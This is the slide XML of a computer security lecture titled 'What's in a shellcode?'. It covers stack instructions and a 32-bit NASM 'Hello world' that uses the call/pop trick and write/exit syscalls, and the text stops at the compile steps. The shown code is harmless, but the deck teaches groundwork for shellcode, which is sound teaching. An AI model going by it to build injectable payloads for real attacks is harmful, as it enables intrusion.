        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8339328" y="1170432"/>
            <a:ext cx="733864" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A57AB168-A076-4D9C-AE66-B59892CF8189}" type="slidenum">
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="is-I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20193" y="1052736"/>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1"/>
            <a:ext cx="9143999" cy="1052735"/>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395536" y="152400"/>
            <a:ext cx="8424936" cy="900336"/>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395536" y="1268760"/>
            <a:ext cx="8424936" cy="5400601"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="http://www.google.is/url?source=imglanding&amp;ct=img&amp;q=http://i1.ytimg.com/vi/X1Vec2YqyDE/hqdefault.jpg&amp;sa=X&amp;ei=x5iRT9_gHPSQ4gTXrKSnBA&amp;ved=0CAoQ8wc4GQ&amp;usg=AFQjCNHksbYFEYZ1Wi0If3E-18-0s4XkJw"/>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12476" t="7797" r="32243" b="25386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8190146" y="134714"/>
            <a:ext cx="864096" cy="78330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839200"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marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>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iming>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr kumimoji="0" sz="36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2800" b="1"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b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="0070C0"/>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b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="00B050"/>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b="1" kern="1200">
          <a:solidFill>
            <a:srgbClr val="7030A0"/>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s-IS" dirty="0" smtClean="0"/>
              <a:t>What‘s in a shellcode?</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8327276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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="119063" indent="-119063"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1397000"/>
            <a:ext cx="8382000" cy="863600"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assembly instructions using the stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40965" name="Group 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087521917"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="852264" y="2433638"/>
          <a:ext cx="7608168" cy="2880360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1919536"/>
                <a:gridCol w="5688632"/>
              </a:tblGrid>
              <a:tr h="3762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20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Instruction</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20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Description</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>push &lt;source&gt;</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Push the source operand to the stack.</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12900" algn="l"/>
                          <a:tab pos="1651000" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>pop &lt;destination&gt;</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Pop a value from the stack and store in the destination operand.</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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>call &lt;location&gt;</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Call a function, jumping the execution to the address in the location operand. This location can be relative or absolute. The address of the instruction following the call is pushed to the stack, so that execution can return later.</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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New Bold" charset="0"/>
                          <a:cs typeface="Courier New Bold" charset="0"/>
                          <a:sym typeface="Courier New Bold" charset="0"/>
                        </a:rPr>
                        <a:t>ret</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Return from a function, popping the return address from the stack and jumping execution there.</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168897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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>helloworld1.s</a:t>
            </a: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smtClean="0"/>
              <a:t>Hello world modified</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="2705869"/>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000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BITS 32             ;  Tell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> this is 32-bit code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mark_below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ;  Call below the string to instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "Hello, world!",  0x0a, 0x0d  ; with newline and carriage return bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mark_below</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ssize_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> write(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; Pop  the return address (string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 4        ; Write  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ; STDOUT  file descriptor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 15       ; Length of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: write(1, string, 14)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; void _exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> status);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ; Exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0        ; Status = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:  exit(0)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4869160"/>
            <a:ext cx="7571184" cy="1659429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compile and run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>helloworld1.s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
